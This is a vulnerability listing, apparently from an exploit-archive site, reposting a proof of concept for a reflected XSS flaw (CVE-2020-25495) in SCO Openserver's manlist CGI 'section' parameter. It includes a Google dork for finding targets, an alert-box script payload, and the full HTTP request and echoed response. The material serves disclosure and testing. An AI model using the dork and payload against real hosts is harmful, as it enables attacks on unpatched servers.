Advertisement






SCO Openserver 5.0.7 Cross Site Scripting

CVE Category Price Severity
CVE-2020-25495 CWE-79 $1000 High
Author Risk Exploitation Type Date
Unknown High Remote 2020-12-21
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020120146

Below is a copy:

SCO Openserver 5.0.7 Cross Site Scripting
# Exploit Title: SCO Openserver 5.0.7 - 'section' Reflected XSS
# Google Dork: inurl:/cgi-bin/manlist?section
# Discovered Date: 14/06/2020
# Author: Ramikan
# Vendor Homepage: https://www.xinuos.com/products
# Software Link: https://www.sco.com/products/openserver507/-overview
# Affected Version: Tested on 5.0.7, 6 can be affected on other versions.
# Tested on: SCO Openserver 5.0.7 & version 6
# CVE : CVE-2020-25495

*************************************************************************************************************************************

Vulnerability :Refelected XSS & HTML Injection

*************************************************************************************************************************************
A reflected Cross-site scripting (XSS) vulnerability in Xinuo (formerly SCO) Openserver version 5 and 6 allows remote attackers to inject arbitrary web script or HTML tag via the parameter 'section'.


Affected URL:http://host:8457/cgi-bin/manlist?section="><h1>hello</h1><script>alert(123)</script>
Affected Paramenter: section

*************************************************************************************************************************************
POC

*************************************************************************************************************************************
Request:
*************************************************************************************************************************************
GET /cgi-bin/manlist?section="><h1>hello</h1><script>alert(123)</script> HTTP/1.1
Host: 192.168.20.48:8457
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

*************************************************************************************************************************************
Response: 
*************************************************************************************************************************************
HTTP/1.1 200 OK
Date: Thu, 03 Sep 2020 17:08:51 GMT
Server: Apache/1.3.36 (Unix) mod_perl/1.29
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 2680

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
 "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<head>
<title>Manual section "><h1>hello</h1></P><script>alert(123)</script></title>
<META HTTP-EQUIV='Content-Type' CONTENT='text/html;charset=ISO-8859-1'>
<link rel="stylesheet" type="text/css" href="/styles/lin_moz.css" />
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
</head>
<body bgcolor="#FFFFFF" topmargin="0" marginheight="0">
<!-- Begin DocView navigation toolbar -->
<!--htdig_noindex-->
<table
class=dvtb
width="100%"
cellpadding=0
cellspacing=0
border=0
style="padding: 0;"
>
<tr valign=top class=dvtb>
<td class=dvdb>
<table 
class=dvtb
cellpadding=3
cellspacing=1
border=0
bgcolor=#FFFFFF
width=611
>
<tr class=dvtb>
<td class=dvtb align=center  style="background: #2059A6;">
<a href="/en/index.html" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;">
DOC HOME
</a></td>
<td class=dvtb align=center  style="background: #2059A6;">
<a href="/en/Navpages/sitemap.html" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;">
SITE MAP
</a></td>
<td class=dvtb align=center  style="background: #2059A6;">
<a href="/cgi-bin/manform?lang=en" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;">
MAN PAGES
</a></td>
<td class=dvtb align=center  style="background: #2059A6;">
<a href="/cgi-bin/infocat?lang=en" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;">
GNU INFO
</a></td>
<td class=dvtb align=center  style="background: #2059A6;">
<a href="/cgi-bin/search?lang=en" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;">
SEARCH
</a></td>
</tr>
</table>
</td>
<td class=dvtb align="left" width=100%>
<table
class=dvtb
cellpadding="3"
cellspacing="1"
border="0"
width="100%"
bgcolor="#FFFFFF"
>
<tr class=dvtb valign="top">
<td class=dvtb  style="background: #2059A6;" align=center width=100%>
<a name=null class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;" >
&nbsp;
</a>
</td>
</tr>
</table>
</td>
</tr>
</table>
<!--/htdig_noindex-->
<!-- End DocView navigation toolbar -->
<h1>Manual section<h1>Manual section "><h1>hello</h1></P><script>alert(123)</script></h1><PRE>
</PRE>
</body></html>

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum